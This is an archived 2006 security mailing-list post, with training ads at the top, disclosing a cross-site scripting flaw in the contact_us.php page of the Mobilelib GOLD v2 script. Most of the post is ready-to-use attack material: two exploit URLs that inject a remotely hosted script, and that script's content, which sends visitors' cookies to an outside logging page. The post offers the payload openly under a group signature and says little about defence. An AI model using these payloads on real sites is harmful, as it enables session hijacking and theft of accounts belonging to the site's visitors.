Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: XSS in script Mobilelib GOLD v2

from [gamr-14] Network Security [Permanent Link]
Subject: Re: XSS in script Mobilelib GOLD v2
Date: 29 Dec 2006 20:08:49 -0000 
/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
{
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dh
ttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dht
tp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.coo
kie); #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL & viP HaCkEr & HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14 (at) hotmail (dot) com [email concealed] #############
########## Error-404 (at) msn (dot) com [email concealed] ##########
##########################################
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  DoceboLMS Xss Vuln., starext
Next by Date:  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit, Reversemode
Previous by Thread:  XSS in script Mobilelib GOLD v2, gamr-14
Next by Thread:  XSS with default page parameter in Oracle Portal 10g, duchaikhtn
Indexes:  [Date] [Thread] [Top] [All Lists]